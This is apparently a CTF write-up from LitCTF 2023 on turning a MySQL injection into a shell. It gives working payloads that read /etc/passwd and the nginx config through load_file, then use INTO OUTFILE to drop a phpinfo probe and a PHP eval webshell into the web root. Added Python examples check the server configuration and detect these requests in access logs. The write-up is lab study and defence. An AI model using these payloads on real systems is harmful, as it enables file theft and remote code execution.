
Getting a shell through MySQL injection

2023/5/23 Web Sql

Preface

I saw this technique in a write-up for the [LitCTF 2023] challenge "这是什么?SQL !注一下 !" and am noting it down here.


Principle

Use MySQL's INTO OUTFILE to write a webshell through a crafted SQL statement, then execute system commands through the webshell's parameter.

Conditions

  • The MySQL server process has write permission on the target directory
  • The absolute path of the web root is known
  • secure_file_priv is empty, or points to a directory under the web root
  • PHP's magic_quotes_gpc is off
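An added example (not from the original post) that checks the MySQL-side conditions above from values an administrator already has: the account's SHOW GRANTS lines, the secure_file_priv variable and the web root. It assumes the inputs are supplied by hand (constructed samples below) and does not connect to a database; the OS-level write permission of the mysqld user still has to be checked on the host.

```python
import os
import re

# Added example, not from the original post: evaluate whether an INTO OUTFILE
# write into the web root is possible for a given DB account and server config.
# Inputs are constructed samples; nothing here talks to a real server.

# INTO OUTFILE / LOAD_FILE need the global FILE privilege (or ALL PRIVILEGES
# ON *.*); database-scoped grants such as ON `app`.* never include it.
FILE_PRIV_RE = re.compile(r"^GRANT (?:ALL PRIVILEGES|.*\bFILE\b.*) ON \*\.\* ", re.I)


def has_file_privilege(grants):
    """True if any SHOW GRANTS line gives the account FILE (or ALL) globally."""
    return any(FILE_PRIV_RE.match(g.strip()) for g in grants)


def outfile_reaches(secure_file_priv, web_root):
    """Where may mysqld write?  None means NULL (file export disabled),
    '' means anywhere, otherwise only inside that directory."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    allowed = os.path.normpath(secure_file_priv)   # strips the trailing '/'
    root = os.path.normpath(web_root)
    # containment test: the web root must sit inside secure_file_priv
    return os.path.commonpath([allowed, root]) == allowed


def assess(secure_file_priv, grants, web_root):
    """Return (exposed, reason) for the two conditions that live in MySQL."""
    if not has_file_privilege(grants):
        return False, "account lacks the global FILE privilege"
    if not outfile_reaches(secure_file_priv, web_root):
        return False, "secure_file_priv keeps INTO OUTFILE away from the web root"
    return True, "FILE privilege plus reachable web root: INTO OUTFILE can drop a file there"


# Constructed samples: a permissive account next to a least-privilege one.
PERMISSIVE_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
HARDENED_GRANTS = ["GRANT USAGE ON *.* TO 'web'@'localhost'",
                   "GRANT SELECT ON `app`.* TO 'web'@'localhost'"]

if __name__ == "__main__":
    print(assess("", PERMISSIVE_GRANTS, "/var/www/html"))
    print(assess("/var/lib/mysql-files/", HARDENED_GRANTS, "/var/www/html"))
```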

Procedure

The challenge's SQL statement:

<?php
$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
$result = $conn->query($sql);

  1. Ordinary injection to read a file (the challenge wraps the id in parentheses, which must be closed first)

?id=-1)))))) union select load_file('/etc/passwd'),2%23

The content of /etc/passwd is returned:

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,,,:/home/www-data:/sbin/nologin
mysql:x:100:101:mysql:/var/lib/mysql:/sbin/nologin
nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
  2. Read the nginx configuration file to find the web root (the root directive in the output)

?id=-1)))))) union select load_file('/etc/nginx/nginx.conf'),2%23

Returned:

Array ( [0] => Array ( [username] => daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } } } [password] => 2 ) )
  3. Read the index page

?id=-1)))))) union select load_file('/var/www/html/index.php'),2%23

Returned:

Array
(
   [0] => Array
	   (
		   [username] => <?php
   error_reporting(0);
 include "connect.php";
?>
<!DOCTYPE html>
<html>
<head>
   <meta charset="utf-8">
   <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
   <title>狠狠的注入涅~</title>
   <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
   <link rel="stylesheet"
	   href="https://fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic,700italic&amp;display=swap">
</head>
<body>
   <header class="text-center text-white masthead"
	   style="background:url('https://www.dmoe.cc/random.php')no-repeat center center;background-size:cover;">
	   <div class="overlay"></div>
	   <div class="container">
		   <div class="row">
			   <div class="col-xl-9 mx-auto position-relative">
				   <h1 class="mb-5">Search what you want to search</h1>
			   </div>
			   <div class="col-md-10 col-lg-8 col-xl-7 mx-auto position-relative">
				   <form method="get" action="">
					   <div class="row">
						   <div class="col-12 col-md-9 mb-2 mb-md-0">
							   <input class="form-control form-control-lg" type="text" name="id"
								   placeholder="Enter your id to start">
						   </div>
						   <div class="col-12 col-md-3">
							   <button class="btn btn-primary btn-lg" type="submit">姨妈大!</button>
						   </div>
					   </div>
				   </form>
			   </div>
		   </div>
	   </div>
   </header>
<section class="text-center bg-light features-icons">
   <div class="container">
	   <div class="row">
		   <div class="col-md-6"> 
			   <h5>Key Source</h5>
			   <pre><?php highlight_file(source) ?></pre>
		   </div>
		   <div class="col-md-6"> 
			   <?php
			   
			   $sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
			   echo "<h5>Executed Operations:</h5>"
				   .$sql
				   ."<br><br>";
			   $result = $conn->query($sql);
			   if ($result->num_rows > 0) {
					   print_r(mysqli_fetch_all($result, MYSQLI_ASSOC));
			   } else {
				   echo "0 results";
			   }
			   ?>
		   </div>
	   </div>
   </div>
</section>
   <section class="showcase">
	   <div class="container-fluid p-0">
		   <div class="row g-0"></div>
	   </div>
   </section>
   <script src="assets/bootstrap/js/bootstrap.min.js"></script>
</body>
</html>
		   [password] => 2
	   )
)
  4. Write a PHP probe

?id=-1)))))) union select '<?php phpinfo();?>',2 into outfile '/var/www/html/info.php'%23

Visit the corresponding URL/info.php; if the phpinfo page appears, the write succeeded.

  5. Write the webshell

?id=-1)))))) union select '<?php eval($_POST["cmd"]);?>',2 into outfile '/var/www/html/shell.php'%23

Connect to the corresponding URL/shell.php with AntSword (蚁剑); the password is cmd.
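An added example (not part of the original write-up) from the detection side: the five requests above leave distinctive traces in the web server's access log, and this scanner flags the three primitives they rely on (UNION SELECT, LOAD_FILE, INTO OUTFILE) after URL-decoding the request. The log lines are constructed samples in nginx's combined format; the signature names and the `scan` function are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the original write-up: flag access-log requests
# carrying the injection primitives used in the procedure above.

SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "load_file":    re.compile(r"\bload_file\s*\("),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b"),
}

# nginx combined format: client ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def normalise(target):
    """Decode twice (double encoding is common), collapse whitespace and
    lower-case, so %20, '+' and mixed case cannot hide the keywords."""
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(line):
    """Names of the signatures matching one log line ([] if none or unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    text = normalise(m.group("target"))
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan(lines):
    """(client ip, raw target, matched signatures) for every suspicious line."""
    hits = []
    for line in lines:
        names = classify(line)
        if names:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("target"), names))
    return hits


# Constructed sample log: three lines mirror the read/write requests above,
# the last two are benign traffic that must not fire (note "union selection").
SAMPLE_LOG = [
    '10.0.0.5 - - [23/May/2023:10:01:02 +0800] "GET /index.php?id=-1))))))%20union%20select%20load_file(%27/etc/passwd%27),2%23 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [23/May/2023:10:01:09 +0800] "GET /index.php?id=-1))))))+UNION+SELECT+load_file(%27/etc/nginx/nginx.conf%27),2%23 HTTP/1.1" 200 4096',
    '10.0.0.5 - - [23/May/2023:10:02:31 +0800] "GET /index.php?id=-1))))))%20union%20select%20%27x%27,2%20into%20outfile%20%27/var/www/html/probe.php%27%23 HTTP/1.1" 200 812',
    '10.0.0.9 - - [23/May/2023:10:03:00 +0800] "GET /index.php?id=7 HTTP/1.1" 200 2310',
    '10.0.0.9 - - [23/May/2023:10:03:05 +0800] "GET /search?q=union+selection HTTP/1.1" 200 1900',
]

if __name__ == "__main__":
    for ip, target, names in scan(SAMPLE_LOG):
        print(ip, names, target)
```

In a real deployment the same logic applies to the database's general log or a WAF feed; a hit on into_outfile against a PHP path is worth an immediate check of the web root for new files.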